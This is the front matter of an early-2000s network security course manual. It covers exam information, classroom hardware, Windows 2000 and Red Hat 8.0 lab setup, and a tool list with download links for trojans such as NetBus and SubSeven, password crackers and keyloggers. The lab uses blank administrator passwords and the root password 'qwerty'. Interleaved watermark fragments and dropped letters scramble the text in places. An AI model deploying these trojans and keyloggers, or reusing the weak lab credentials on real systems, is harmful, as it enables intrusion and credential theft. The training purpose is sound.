Ed or ru ct st
xviii Hardening The Infrastructure (SCP)
In
DO
NO
DU
PL
IC
AT
iti
on
ABOUT THIS COURSE

Hardening the Infrastructure is designed to provide network administrators with an awareness of security-related issues and the essential skills they need to implement security in a given network. It is the rst course offered in the rst level of the Security Certied Program. The Security Certied Program (SCP) Wherever you are in life, you will nd that the people around you have certain skills that help position them in the elds they want to work in. Doctors, lawyers, engineers, and architects are just a few of the many examples. So it should be no surprise that the computer and networking elds have come to create and foster certications to help individuals prove to employers, and themselves, that they meet the required skills to perform adequately in their specic elds; be it the entry-level person beginning with a basic hardware repair technician certication or the infrastructure expert heading for the highest level of router certication. What is the Security Certied Program?
or
DO NO
ru ct
In
st
DU
The SCP certications are comprised of two vendor-neutral security certications. The rst level of certication is the Security Certied Network Professional (SCNP), and the second level of certication is the Security Certied Network Architect (SCNA).
PL
About This Course
IC
The SCP structure is unique as it measures competence in core security skills as well as skills needed for specic security technologies, such as Packet Structure and Signature Analysis, Operating System Hardening, Router Security, Firewalls, Virtual Private Networks (VPNs), Intrusion Detection, Risk Analysis, Digital Signatures and Certicates, Biometrics, and Network Forensics.
AT
E
xix
Ascendant Learning, a Chicago-based security training organization, has created the Security Certied Program (SCP) to help develop and validate your skills as a computer and network security professional.
Ed
iti
on
ABOUT THIS COURSE
Ed or ru ct
What is the SCNP?
st
The SCNP (Security Certied Network Professional) is SCPs Level One certicate, and it is primarily focused on defense. Level One deals with the protective security technologies in todays enterprise environmentsTCP Packet Analysis, Operating System Hardening, Router Security, Firewall Systems, Intrusion Detection Systems (IDSs), Virus Protection, VPNs, and Disaster Recovery. The SCNP is a certication track that will test your ability to congure and maintain a secure networking environment. What kind of experience do I need before I go for my SCNP? Before you begin the SCNP certication track, it is recommended that, at a minimum, you attain CompTIAs Security+ certication or have equivalent training with hands-on experience. The SCNP training and certication builds on concepts and skills covered in the Security+ certication. How do I become SCNP-certied?
xx
In
DO
NO
DU
PL
IC
AT
iti
on
The SCNP certication is comprised of two exams, Hardening the Infrastructure (HTI), and Network Defense and Countermeasures (NDC). To become SCNPcertied, candidates must pass both of these Level One exams. It is also recommended that candidates study the official courseware before taking the exams.
The exams are multiple-answer, often scenario-based, tests. The HTI exam has 90 questions, and the candidate has 90 minutes to complete the exam. At the time of this publication, the exam breakdown was as follows. Examination Domain
1.0Contingency Planning 2.0Tools and Techniques 3.0Security on the Internet and the WWW 4.0Router Security and ACLs 5.0TCP/IP Packet Structure and Security 6.0Operating System Security Total
How do I take the exams?
ru ct
For International Exam Registration, please check with your preferred vendors Web site for more information. During the exam: Read questions carefully. Dont jump to any conclusions!
Skip questions that you are unsure of, and come back to them at the end.
st
If you come back to a question and are not sure about an answer, remember that your rst hunch is more often correct than your second-choice answer (after overanalyzing the question)!
In
Be sure to answer all questions; unanswered questions count against your score, so if you just dont have an answer, try to eliminate any options that you know are wrong and make a best guess from whatever remains.
DO
If you have time remaining, you will be given the opportunity to review your answers. Be sure to do so, and make sure you didnt make any obvious mistakes.
NO
DU
PL
About This Course
There are several ways to register for an exam. To register for SCP exams over the Internet, visit Prometric at www.2test.com or VUE at www.vue.com/it/, and create an account with the vendor of your choice (if you dont already have one).
IC
The SCP exams are available at any Prometric or VUE Testing center, in over 7,400 locations around the world.
or
AT
Note that SCP exams are updated regularly to reect changes in the network security industry. It is strongly recommended that potential candidates review the exam objectives at www.securitycertied.net/certications.htm.
Ed
5 9 11 15 25 35 100
E
xxi
iti
Percentage of Exam
on
What are the exams like?
On your exam day, try to arrive 15 minutes early so you do not feel rushed or stressed by being late. This will also give you a few minutes to review any notes before beginning your exam. However, as the SCP exams are closed-book, notes or calculators may not be brought into the testing station and will have to be left with the facilitys faculty.
The current price for Level One exams are $150 each (USD). Will my certication expire?
What if I want to go further?
SCPs Level Two deals with trust. Many enterprises are trying to integrate Digital Signatures, Digital Certicates, and Biometric and Smart Card authentication systems into their infrastructures. Trust, as it pertains to network security, is vital for businesses as they look to integrate their partners and suppliers into their business structures and provide real-time information and services to their customers. Level Two is about the fundamentals of building a trusted network, strong authentication techniques, encryption, biometrics, smart cards, and network forensics. SCP Level Two includes two courses, PKI and Biometrics Concepts and Planning (PBC), and PKI and Biometrics Implementation (PBI). Each course is a 40-hour program, and the content and hands-on labs are structured to develop the skills required by todays security experts.
Ed
T DU
After you have become SCNP-certied and want to further your knowledge, you can move on to the second level of the SCP track.
or
DO NO
In
xxii
st
ru ct
To become a Security Certied Network Architect (SCNA), candidates must pass two exams. The rst is Advanced Security Implementation (ASI), and the second is The Solution Exam (TSE); which will cover all facets of technologies covered in all of the SCP courses. How do I prepare for the exam?
The HTI exam will require that you be familiar with the many technologies and utilities that are covered in this book. Further, the test was authored with the intention that people who have not become familiar with the technologies and utilities covered will not nd it as easy to pass the exam as those who have used the programs and technologies in question. What does this all mean? It means that you really should use the utilities and programs that are covered here, rather than just read about them. You should become very familiar with all of the tasks in this book. If possible, create a home lab with at least two machines, and practicerepeatedlythe hands-on tasks in this book. Even using what you learn to help secure your own home network from hosts on the Internet will help you prepare for the exam. Studying for the exam: 1. Read the book from start to nish, completing all tasks even if you are familiar with the technology in question. You never know when some new
PL
IC
AT
iti
Yes. As technologies in the security eld are constantly changing, your certicate will be valid for two years starting on the date you pass the second exam. SCNPs will need retake only the NDC exam before their SCNP certication expires. Candidates who are recertifying will be able to do so at a discounted exam rate.
on
How much do the exams cost?
facet of a technology or program may be brought up, and many of the lessons build upon the previous one. It is easy to miss something if you skip around. 2. Be sure to complete all hands-on tasks. Again, the SCP exams are based on knowledge and hands-on experience. Once you have completed a task, try doing it again.
3.
Be sure to answer the Topic Review questions within each lesson. Make note of the questions you answered incorrectly, and study the appropriate sections again. Before taking the SCP exams, it is recommended that you take the practice exams available through MeasureUp. More information on officially recommended practice exams is available at www.securitycertied.net/practice_ tests.htm.
4.
Practice exams
The Security Certied Program U.S.: 800-869-0025 International: 630-472-5790 Email: Info@SecurityCertied.Net
or
DO NO T
Course Prerequisites
To ensure your success, we recommend you rst take the following New Horizons courses or have equivalent knowledge: Network+ Certication - Third Edition2002 Objectives, A CompTIA Certication
Course Objectives
When youre done working your way through this course, youll be able to:
In
st
Security+ - A CompTIA Certication
DU
About This Course
Web site: www.SecurityCertied.Net
ru ct
PL
IC
AT
xxiii
Contact information
The only provider of practice exams authorized and recommended by the creators of the SCP is MeasureUp. Visit www.securitycertied.net/practice_tests.htm for more information.
Ed
But perhaps the best way to make sure that you reach your goal is to register for the exam and stick to the date you set. Nothing keeps you on your toes and working toward a goal like a deadline! Honestly measure your skills, make your study schedule, set the date that you will be ready to take the exam, and register for it.
iti
on
Investigate advanced concepts and procedures related to the TCP/IP protocol. Work with the secure version of IP, IPSec. Secure Linux computers and networks. Secure Windows 2000 computers and test the effectiveness of various security measures. Secure routers by using Access Control Lists and logging options. Investigate measures that can help ensure business continuity in the event of a disaster, such as contingency planning and power and backup issues. Dene common Internet components, and identify techniques used in Web hacking and other attacks. Examine and work with common techniques used to attack networks and specic operating systems.
COURSE SETUP INFORMATION
Student machines
1 per student
ru ct
Instructor machines Cisco routers 1 3
st
In
Cisco console cables Serial cables Switches or hubs Hardware keylogger Null-modem and crossover cables
2 2 1
DO
1 set for each pair of students
xxiv
NO
128 MB of RAM (256 MB or more recommended). 8 GB hard disk. Two non-integrated NICs (Intel or 3COM preferredfor promiscuous mode support). Video card (Nvidia TNT2 preferredfrom the point of view of driver availability for all OSs). Same as student machines.
2500 Series preferred; IOS 12.2 or greater, with IPSec/SSH support.
DCE to DTE, for connecting routers together. 10/100 Mbps.
CAT 5.
DU
PL
500 MHz Pentium III processor (700 MHz or higher recommended).
IC
Hardware Type
or
Quantity
The hardware listed in the following table.
Minimum Specications
AT
Please read the Course Setup information thoroughly, and gather all of the hardware and software listed here before you proceed with this installation.
Hardware and Software Requirements

To run this course, you will need:
Ed
iti
on
For class preparation and use, the following software: A bootable DOS oppy disk with common utilities such as FDISK, FORMAT, MSCDEX, DELPART, and so forth, is sufficient for class purposes.
Service Pack 2 for Windows 2000 Server. This Service Pack is free, and can be downloaded from http://download.microsoft.com/download/ win2000platform/SP/SP2/NT5/EN-US/W2KSP2.exe (save the le to disk). The Internet Explorer 6 upgrade. This upgrade is free, and can be downloaded from www.microsoft.com/windows/ie/default.asp (you might need to be connected to the Internet to do the actual upgrade). Disk-cloning tools. Norton Ghost is recommended.
Ed
DU PL IC T
Hardware drivers for each OS and peripheral, especially NIC and video drivers. You should always keep these handy. In addition to having them on a CD, it is generally advisable to have a set of properly labeled oppy disks.
SID-changing utilities. Norton Ghostwalk is recommended.
ru ct
Used in Tasks
Yes Yes Yes No No
DO
Network Scanning Tools
st
NO
For use in class, you will also need to acquire the tools and utilities described in the following tables. Tables are arranged by function, such as network scanning, rewalls, and so forth. Links are provided to enable you to download les from the Web, via an HTML version of these setup instructions on the course CD. Create a Tools share (or a CD) for use in class. Download and organize the tools in an appropriate folder structure, such as in folders named Linux Tools, Windows Tools, and Miscellaneous. The Miscellaneous folder can include utilities like MS Office le viewers, le unzippers, Adobe Acrobat Reader, and so forth. The capture and signature les required for some of the tasks in the course, as well as all the RFCs, are included with each course manual.
or
Download From
The sysprep utility, from the Windows 2000 Resource Kit.
AT
Be aware that these tables contain tools and utilities that are not specically used in the hands-on activities in this course.
Tool
SuperScan Nmap NmapFE NmapNT Pinger
OS/Cost
Windows/Eval is Free Linux/Built-in Linux/Built-in Windows/Free Windows/Free
www.foundstone.com/knowledge/scanning. html Included in Red Hat 8.0 Included in Red Hat 8.0 www.eeye.com/html/Research/Tools/nmapnt/ nmapNTsp1.zip http://visualsoftru.com/ping/pinger.exe
In
E
All links listed in this document were last tested for availability on February 14, 2003.
iti
The Red Hat 8.0 Linux operating system. It does not matter if you use the Personal or Professional Edition. The cost of this software is free, if you download it from www.redhat.com (or any of the various mirror sites listed there). It is recommended that you also download the installation guide. If you decide to download the OS from the Internet, download the ISO les and create CDs from the images. Choosing the Burn As Image option ensures that the CDs will be bootable.
on
The Windows 2000 Server operating system. The cost of an evaluation copy is $7.95, and you can obtain the software from the Microsoft Training Kits, TechNet, or http://microsoft.order-2.com/win2kast.
It is assumed that each education center has a TechNet or MSDN subscription and the Windows 2000 Resource Kit.
About This Course
xxv
Tool
Strobe Nessus udpood.exe NetScan Tools Pro Netcat
OS/Cost
Linux, Windows/Free Linux/Free Windows/Free Windows/Eval is Free Linux, Windows/Free
Used in Tasks
No Yes Yes No Yes
Download From
For Linux, www.luyer.net/software/strobeclassb/ ftp://ftp.nessus.org/pub/nessus/nessus-2.0.3/ nessus-installer/nessus-installer.sh www.foundstone.com/knowledge/stress_ testing.html ftp://ftp.netscantools.com/pub/nst430a.zip For Linux, included with Red Hat 8.0. For Windows, www.atstake.com/research/tools/ nc11nt.zip
Network Sniffer and Routing Tools
Tool
Network Monitor Ethereal 0.9.11 Tcpdump Windump WinPcap 2.3 Visual Route NeoTrace
OS/Cost
ru ct
Password Tools Tool
No
st
DO
L0pht Crack 2.5 L0pht Crack LC4 Crack 5.0 John the Ripper
Windows/Eval is Free Windows/Eval is Free Linux/Free
NO
OS/Cost
T
No Yes No Yes
Used in Tasks
DU
Download From
www.32bit.bhs.com/downloads/le. asp?id=4519 www.atstake.com/research/lc/application/ lc4setup.exe ftp://ftp.openbsd.org/pub/OpenBSD/2.7/ packages/i386/crack-5.0.tgz For Linux, www.openwall.com/john/john-1. 6.tar.gz For Windows, www.openwall.com/ john/john-1.6w.zip www.snadboy.com/RevelationV2.zip Yes (Linux version only)
In
Snadboys Revelation
Windows, Linux, DOS/ Free Windows/Free
xxvi
PL
Linux/Free Windows/Free Windows/Free Windows/Eval is free Windows/Eval is free
or
IC
No No Yes Yes
www.tucows.com/preview/194046.html
AT
Windows/ Built-in Windows, Linux/Free
Ed
Used in Tasks
Yes Yes
iti
Download From
Included in Windows 2000 Server
For Linux, included with Red Hat 8.0. For Windows, www.ethereal.com/distribution/ Win32 www.tcpdump.org/ http://windump.polito.it/install/default.htm http://windump.polito.it/install/default.htm ftp://ftp.visualware.com/pub/vr/vr.exe
on
Trojan Horses and Exploit Tools Used in Tasks

No Yes No No
Tool
Netbus NetBus Pro SubSeven GetAdmin
OS/Cost
Windows/Free Windows/Free Windows/Free Windows NT/ Free
Download From
Forensics and Keyboard Logging Tools Used in Tasks

Yes
NTFSDOS
Linux/Free, DOS/Eval is free
Keylogger
Klogger
Intrusion Detection Tools
st
Tool
OS/Cost
Download From
Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/ download/ Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/ download/ www.snort.org/dl/binaries www.snort.org/dl/contrib/front_ends
ISS Internet Scanner 6 ISS System Scanner 6 Snort
Windows/Free
No
In
Windows/Free
No
IDSCenter
Linux, Windows/Free Windows/Free
No No
DO
Used in Tasks
NO
http://ntsecurity.nu/cgi-bin/download/ klogger.exe.pl
DU
About This Course
Keystroke logger
ru ct
www.electronickits.com/spy/nish/ computer/key.htm
PL
IC
Security keyboard
Any (This is Yes hardware.)/ $89 to $199 (one per class only) Yes Any (This is hardware.)/ $129 to $299 (one per class only) Any (This is Yes hardware.)/$54.95 (one per class only) Windows/Free Yes
For DOS, www.sysinternals.com/les/ ntfs30r.zip (The Read-only version will do.) For Linux, linux-ntfs.sourceforge.net/info/ redhat.html#how www.keyghost.com
Ed
Tool
OS/Cost
Download or Order From
or
www.keyghost.com
AT
xxvii
iti
on
http://nttoolbox.com/public/tools/ NetBus170.zip http://home.t-online.de/home/TschiTschi/ netbus_pro_eng.htm www.subseven.ws/ http://packetstormsecurity.org
Firewalls Used in Tasks

No
Tool
CheckPoint NG
OS/Cost
Windows 2000 Server with SP2/ $2000 approx. (one per class only) Windows 2000 with SP1 min./Eval is Free
Download From
ISA Server2000
No
www.microsoft.com/isaserver/evaluation/ trial/default.asp
Network and Security Administration Tools
Tool
IPv6 Technology Preview Webmin
OS/Cost
Windows/Free
ru ct st
HiSecWeb security template IIS Lockdown tool
Windows/Free
NO
pwlib-1.3.3-5. i386.rpm perl-Tk-800. 023-9mdk. i586.rpm Windows 2000 Gold Standard PuTTY.exe
Linux/Free
Yes
Windows/Free
Yes
DU
Linux/Free
Yes
T
Yes Yes Yes http://the.earth.li/~sgtatham/putty/latest/ x86/putty.exe http://download.microsoft.com/download/ win2000srv/SCM/1.0/NT5/EN-US/ hisecweb.exe http:/download.microsoft.com/download/ iis50/Utility/2.1/NT45XP/EN-US/iislockd. exe
Windows/Free
xxviii
In
DO
Windows/Free
PL
IC
Tripwire Bastille
or
Any (browserbased management.)/ Free Linux/Built-in Linux/Free
Ed
Used in Tasks
Yes Yes Yes Yes
Included with Red Hat 8.0 http://osdn.dl.sourceforge.net/sourceforge/ bastille-linux/Bastille-2.0.4-1.0.i386.rpm www.bastille-linux.org/pwlib-1.3.3-5.i386. rpm www.bastille-linux.org/perl-Tk-800.0239mdk.i586.rpm www.cisecurity.org
AT
iti
Download From
http://msdn.microsoft.com/downloads/ sdks/platform/tpipv6/download.asp www.webmin.com. Download either the rpm or the tarball.
on
www.checkpoint.com. Part number is CPFW-FM-25-NG.
Tool
HFNetChk tool
OS/Cost
Windows/Free
Used in Tasks
Yes
Download From
http://download.microsoft.com/download/ win2000platform/Utility/3.3/NT45/EN-US/ Nshc332.exe (For the original commandline tool, go to hfnetchk.shavlik.com/ hfnetchk_3.86.0.1.exe. Or, for the new Microsoft Baseline Security Analyzer, go to download.microsoft.com/download/e/5/7/ e57f498f-2468-4905-aa5f-369252f8b15c/ mbsasetup.msi.)
Miscellaneous Tools Used in Tasks

Yes No No
Tool
File Unzippers PDF Viewer MS Ofce Viewers
OS/Cost
Windows, DOS/Free Windows/Free Windows/Free
Download From
www.winzip.com, www.pkware.com, or www.rarlab.com www.adobe.com/products/acrobat/ readstep2.html http://ofce.microsoft.com/downloads/ default.aspx
Ed
T DU PL IC
A bootable DOS oppy disk, similar to the one used for class preparation. Tools and utilities as described previously. These tools need to be downloaded from the Web and can be burned onto a CD-ROM, placed in a shared folder on the classroom network, or copied onto the student machines. Note: If you decide to create a Tools CD-ROM for use in class, make sure that the instructor collects the CD-ROMs from the students at the end of the course.
The CD-ROM included with the course manual.
For use in class, the instructor will need the following:
st
The CD-ROM included with the course manual. A hardware keylogger.
Class Requirements
In order for the class to run properly, perform the procedures described below.
In
Note: During class, the instructor does not need to have, but should have access to, the disks used for class preparation.
DO
Tools and utilities as described previously. These tools need to be downloaded from the Web, and can be burned onto a CD-ROM or copied onto the instructors machine.
NO
A bootable DOS oppy disk, similar to the one used for class preparation.
ru ct
or
AT
About This Course xxix
For use in class, students will need the following:
iti
on
Before you begin actually setting up the class, here are some recommendations for classroom conguration and hardware preparation.
Estimated minimum time for classroom setup (12 student machines and one instructor machine): 5 hours.
Recommendations for Hardware Preparation

The minimum hardware requirements are listed earlier in this course. It is not advisable to use anything less. It is recommended that all the computers be of the same or similar hardware conguration. If you do use computers with integrated motherboards and the video uses shared memory, we recommend you decrease the amount of shared memory to 2 MB so that you have as much RAM available for the OS as possible.
Classroom Configuration
Ed
T DU
Figure 0-1 shows the recommended classroom conguration. Use this gure in conjunction with the IP addressing and naming schemes described in the following section.
or st In
xxx Hardening The Infrastructure (SCP)
Figure 0-1: The recommended classroom conguration includes 12 student computers and 1 instructor computer.
IP Addressing and Computer Naming Scheme

Refer to the class layout diagram shown in Figure 0-1. The chart in Figure 0-2 shows the recommended IP addressing and computer-naming scheme. Use this pattern to develop addresses and names for additional machines as needed.
DO
ru ct
NO
PL
IC
AT
iti
Congure the BIOS so that the boot order is 1: CD-ROM, 2: Floppy Drive, and 3: Hard Drive. Protect the student machine BIOSs with a password.
on
Part of Classroom
LEFT
Computer or Host Name Windows 2000 Linux

STU-W2K-L01 STU-W2K-L02 STU-W2K-L03 stulnxl01 stulnxl02 stulnxl03 stulnxr01 stulnxr02 stulnxr03 inslnxc01
IP Address and Default Gateway NIC 1 NIC 2

IP: 172.16.10.1; DG: 172.16.0.1 IP: 172.16.10.2; DG: 172.16.0.1 IP: 172.16.10.3; DG: 172.16.0.1 IP: 172.18.10.1; DG: 172.18.0.1 IP: 172.18.10.2; DG: 172.18.0.1 IP: 172.18.10.3; DG: 172.18.0.1 IP: 172.17.10.1; DG: 172.17.0.1 IP: 172.26.10.1 IP: 172.26.10.2 IP: 172.26.10.3 IP: 172.28.10.1 IP: 172.28.10.2 IP: 172.28.10.3 N/A
RIGHT
STU-W2K-R01 STU-W2K-R02 STU-W2K-R03
CENTER
INS-W2K-C01
Ed
PL IC T DU
IMPORTANT: Overview of the Partitioning Scheme for an 8 GB Hard Drive
ru ct
Because you will be installing more than one OS on each machine, its important to set up the proper disk partition sizes. Fortunately, because of the OSs involved, you can do most of this partitioning as part of the installation routines for each OS. See Figure 0-3 for a graphic rendition of the hard drive.
or
DO NO
Figure 0-2: Classroom conguration scheme.
AT
Estimated minimum time for partitioning and installing OSs on one machine: 3 hours.
Figure 0-3: A visual representation of the hard drive partitioning required for this course.
About This Course xxxi
In
st
iti
on
The routers divide the classroom into two halvesLEFT and RIGHTwith the CENTER router controlled by the instructor. The LEFT side is congured for subnet 172.16.0.0, the CENTER is on subnet 172.17.0.0 and the RIGHT side is on subnet 172.18.0.0. Students should be given the passwords for the LEFT and RIGHT routers but not for the CENTER router. In the chart, NIC 1 refers to the network card that is connected to the classroom hub, and NIC 2 refers to the network card that is connected to the partner machine (via a crossover cable).
Another method to create a multi-boot machine is to install a host operating system such as Windows 2000 Professional, congure all the drivers, load VMware on top of the host OS, then install Windows 2000 Server and Red Hat Linux 8.0 as guest operating systems on top of the host OS. Note that this will require substantial hardware resources.
Estimated minimum time for Windows 2000 Server installation and conguration: 1 hour, 30 minutes.
1. 2. 3. 4. 5. 6.
Boot to DOS using a bootable DOS oppy disk (with utilities like delpart.exe, fdisk.exe, format.exe, mscdex.exe, and so forth). Run delpart and fdisk /mbr to clean out the hard drives partitions and Master Boot Record. Insert the installation CD-ROM for Windows 2000 Server, and boot to it. The Windows 2000 Server Setup screen is displayed. Press Enter to specify that you want to perform a new install. The Windows 2000 License Agreement is displayed. Read the License Agreement, and then press F8 to accept the agreement. When you are prompted for the location to use for setting up Windows, create a new partition of 2600 MB and specify this partition as the location for Windows 2000.
Ed
T DU
or
DO NO
8. 9.
At the Welcome To The Windows 2000 Server Setup Wizard screen, click Next. Setup next detects and installs device drivers. For Regional Settings, select your local settings, and then click Next.
In
xxxii
st
ru ct
10. At the Personalize Your Software screen, use student for the Name, and SCP for the Organization. Click Next. 11. If prompted, enter the product key and click Next. 12. In the Licensing Modes screen, select Per Seat and click Next. If you choose Per Server, change the value to 99. 13. In the Computer Name and Administrator Password dialog box, leave the username as Administrator, and specify the Computer Name as XXXW2K-XXX. You will change the computer name on the cloned hard drives after the drives have been cloned. The student computers must use a blank password. (The Instructor machine can have a password, but the student computers cannot). Once the password has been dened or left blank, as appropriate, click Next.
14. If a modem is detected (some integrated motherboards have onboard modems, for example), enter the applicable area code and settings, and then click Next.
PL
IC
AT
7.
When you are prompted, specify that you do want the drive to be NTFS and press Enter. After the partition has been formatted and les copied, the computer will reboot.
iti
on
Installing and Configuring Windows 2000 Server
15. In the Windows 2000 Components screen, select IIS, click Details, check FTP, and click OK. Select Management And Monitoring Tools, click Details, check Network Monitor Tools, and click OK. 16. Click Next.
18. For Network Settings, select Typical Settings and click Next. 19. If prompted, congure the TCP/IP settings to use DHCP for now. You will congure these settings on the cloned hard drives later. 20. Specify that the computer is to be part of a Workgroup called Workgroup.
22. When the Completing The Windows 2000 Setup Wizard is displayed, click Finish to complete the installation.
23. When the computer restarts, remove the installation CD-ROM, and log on to Windows 2000 as Administrator.
Ed
T DU PL IC
21. Click Next to enable the computer to perform the nal installation tasks. This will take several minutes.
25. Insert the Windows 2000 Server CD-ROM, and copy the i386 folder from the CD-ROM to the partition where you installed Windows 2000. Then, remove the CD-ROM. 26. Copy the le w2ksp2.exe to the partition where you installed Windows 2000, and double-click it to install Service Pack 2. 27. Accept all defaults for the Service Pack installation, and reboot when you are prompted to do so.
st
30. Open the Display Properties, select the Settings tab, and change the screen resolution to be at least 800 by 600 pixels. 31. Start Windows Explorer, select the C drive (or the drive letter that corresponds to the Windows 2000 boot partition), and choose View Details. Choose ViewChoose Columns, check Attributes, and click OK.
In
DO
29. If the machines you plan to use in class have the same general hardware conguration, install any necessary drivers so that they will be copied to the cloned hard drives.
NO
28. After the reboot, log on as Administrator, copy the le ie6setup.exe to the Windows 2000 boot partition, and run the program to upgrade to IE 6.
ru ct
or
AT
About This Course xxxiii
24. In the Congure Your Server dialog box, select I Will Congure This Server Later, and click Next. Uncheck Show This Screen At Startup, and then close the Windows 2000 Congure Your Server window.
iti
on
17. In the Date And Time Settings dialog box, enter the local settings and click Next.
Choose ToolsFolder Options. Under Web View, select Use Windows Classic Folders, and click Apply. In the Folder Options dialog box, select the View tab, check the rst three check boxes, select Show Hidden Files And Folders, uncheck the next six check boxes, and click Apply. Then, click the Like Current Folder button, click Yes to close the Folder Views information box, and click OK to close the Folder Options dialog box. 32. Close Explorer.
Setting
Screen Buffer Size Window Size Window Position
Width
90 90 48
Click OK, select Modify Shortcut That Started This Window, and click OK. Close the command prompt. 34. Use the Run dialog box to open a command prompt. Modify this command prompts Layout properties similarly to the previous step. Click OK, select Save Properties For Future Windows With Same Title, and click OK. Then close the command prompt.
Ed
T DU
or
DO NO
In
xxxiv
st
Estimated minimum time for Red Hat 8.0 Linux installation and conguration: 1 hour, 30 minutes.
ru ct
1. 2. 3. 4. 5.
36. If you are not supplying the Windows 2000 tools on a CD-ROM or shared folder, copy the Windows 2000 tools to the Windows 2000 boot partition. 37. Run the Sysprep utility. Do not boot to Windows 2000 again until after you have cloned or multicast the hard drives.
Installing and Configuring Red Hat 8.0 Linux

You can nd a complete installation manual at www.redhat.com/docs/manuals/ linux/RHL-8.0-Manual/install-guide. Insert the Red Hat Linux 8.0 Disc 1 into your CD-ROM drive and boot to it. An installation routine screen with several options is displayed. Press Enter to perform the install in GUI mode. If necessary, use the Tab key to select Skip, and press Enter to skip the test on the CD media. While the anaconda installer runs for a few minutes, please wait at this point. When you are presented with the Welcome GUI, click Next.
PL
35. Right-click the Taskbar and choose Properties. Uncheck Use Personalized Menus and click OK.
IC
AT
iti
4000 42 0
33. Use the StartProgramsAccessories menu to open a command prompt, right-click its title bar, and choose Properties. Select the Layout tab, uncheck Let System Position Window, and change the settings as shown in the following table. Height
on
6. 7. 8. 9.
Accept the default Language selection settings, and click Next. Accept the default Keyboard selection settings, and click Next. Verify that the default Mouse selection settings are accurate, and click Next. For the Installation Type, select Custom. Do not select Serverit will wipe out and take over your hard drive. Click Next.
10. Select Manually Partition With Fdisk and click Next. You can use Disk Druid if you prefer, but these instructions list only the steps for using fdisk.
13. Enter p to see the partition table. Primary partitions are numbered 1 through 4. One of these Primary partitions can be created as an Extended partition. Logical drives within the Extended partition are numbered from 5 onward. 14. Create an extended partition to hold the Linux logical partitions. To do this: a. b. c. d. e. f. Enter n to create a new partition.
Ed
T DU PL IC
12. Verify that the next screen has an explanation of the fdisk options for Linux in the left pane. The commands can be entered in the right pane.
Enter e to specify that you want to create an Extended partition. Enter 2 to specify the Partition Number. For the rst cylinder, press Enter. Enter 1023 to specify the last cylinder.
Enter p to display the partition table again.
15. Create a logical drive of 100 MB for the /boot partition. To do this: a. b. c. d. e. Enter n to create a new partition.
If prompted, specify the partition number as the next available; this should be 5. For the last cylinder enter +100M to create a logical drive of 100 MB.
16. Create a swap space of 256 MB. To do this:
In
a.
Enter n to specify that you want to create a new partition. Enter l to specify that you want to create a logical drive partition. If prompted, specify the partition number as the next available; this should be 6. For the rst cylinder, press Enter. For the last cylinder enter +256M to create a logical drive of 256 MB.
About This Course xxxv
b. c.
d. e.
DO
For the rst cylinder, press Enter.
st
NO
Enter l to specify that you want to create a logical drive partition.
ru ct
or
AT
iti
11. Click the button for your hard drive. If you have only one IDE hard drive thats set to Master, you will see the button labeled as hda. Watch out with this optionmake sure youre creating the install on a machine that is representative of your classroom.
on
17. Create a logical drive for the rest of the space (approximately 5+ GB). To do this: a. b. c. d. e. Enter n to specify that you want to create a new partition. Enter l to specify that you want to create a logical drive partition. If prompted, specify the partition number as the next available; this should be 7. For the rst cylinder, press Enter. For the last cylinder press Enter again to allocate all remaining space in the extended partition for this logical drive
a. b. c.
Enter t to specify that you want to change a partitions type. For the partition number, specify the number for this partition (it should be 6). For Hex code, enter 82 to assign this partition to be the swap space.
Ed
T DU
19. Make the 256 MB partition (logical drive 6) a swap partition. To do this:
st
a. b. c.
Select the Format Partition As ext3 radio button. Click the drop-down button for Mount Point. Select / and click OK.
In
25. Click Next. If you see a popup titled Format Warnings, click Format. 26. In the Boot Loader conguration screen, accept the default boot loader GRUB.
xxxvi
DO
ru ct
a. c. b.
22. If you see a popup informing you that a partition type 82h has to be formatted as a Linux swap partition, and asking if you would like to do so, click Yes. 23. Double-click the 100 MB partition, and assign it to the /boot mount point. To do this:
Click the drop-down button for Mount Point. Select /boot and click OK.
24. Double-click the 5+ GB partition, and assign it to the / mount point. To do this:
NO
Select the Format Partition As ext3 radio button.
PL
IC
21. Enter w to commit to this partition table. When you are returned to the Partitioning With Fdisk screen, click Next.
or
AT
20. Verify that you have the right partition types by viewing the partition table before you write to it (enter p to view). tmp/hda6 should be listed as Linux Swap.
iti
18. Enter p to see the updated partition table. Verify that the three logical drivesnamed hda5, hda6, and hda7are displayed, and that the partition type (in Hex code) is Type 83 for the three logical drives you just created.
on
27. Change the label for the dos partition and make it the default boot drive, by selecting it and clicking Edit, changing the label to read Windows 2000, checking Default Boot Target, and clicking OK. (This is what you will see later in the startup screen.) Click Next. 28. Specify that you do not wish to activate the network interface(s) at boot. When you image this hard drive and boot to Linux, each machine will take a long time to discover that there are no DHCP servers around. 29. Manually set the hostname to xxxlnxxxx (no hyphens or spaces). 30. Leave the miscellaneous settings alone for now, and click Next. You can congure these settings after imaging the hard drives. Click Continue to clear any warning messages you might receive. 31. For Security Level, select No Firewall, and click Next. 32. Accept the default language selection, and click Next.
33. Select the appropriate Time Zone and Daylight Savings Time, where applicable. Click Next.
34. Specify the password for the built-in Root account to be qwerty and click Next. You do not have to create any more accounts at this stage. 35. Accept the defaults for Authentication Conguration, and click Next.
Ed
T DU PL IC
38. For the very rst time you do this install, create a boot disk, as you have no way of knowing at this point whether you can successfully boot from the hard drive or not. After you are done creating the boot disk, you will be prompted for the X conguration. 39. For the video card selection, browse the choices and select the option that matches the video card installed in the computer. Sometimes there are problems here, even if the exact model is found. The way to get around this is to choose Generic SVGA, but only as a last resort. Click Next.
st
40. When the monitor is probed, you may or may not see the right one. Accept the defaults here.
42. Select the login type to be Text, and click Next. This will at least help you to get started if you have any problems with the GUI. 43. Click Exit.
In
41. Specify a resolution of 800x600x16-bit color. Most mid-range projectors do not handle higher resolutions. Do not click the Test button, as it might cause the installation to go into a loop, forcing you to have to abort the install.
DO
ru ct
37. At the About To Install screen, click Next, and wait for the install to go through its steps. Depending upon the CPU, this could take anywhere from 45 to 90 minutes. Change disks when prompted (you will need to use all three disks).
NO
or
36. When selecting Package Groups, scroll down and select Everything, and then click Next to do a complete install of all packages.
AT
About This Course xxxvii
iti
on
44. As the machine reboots, remove the oppy disk. The CD-ROM will be ejected automatically; remove it and close the CD drawer. 45. When the GRUB loader is displayed, choose Red Hat Linux to test the installation.
47. Enter startx to test the GUI.
49. At the welcome screen, click Forward.
51. If any hardware, such as the sound card, is detected, either test it or ignore it for now. Click Forward. 52. If you are prompted to register, click No, I Do Not Want To Register and click Forward.
Ed
T DU
50. If necessary, verify the date and time, and click Forward.
st
In
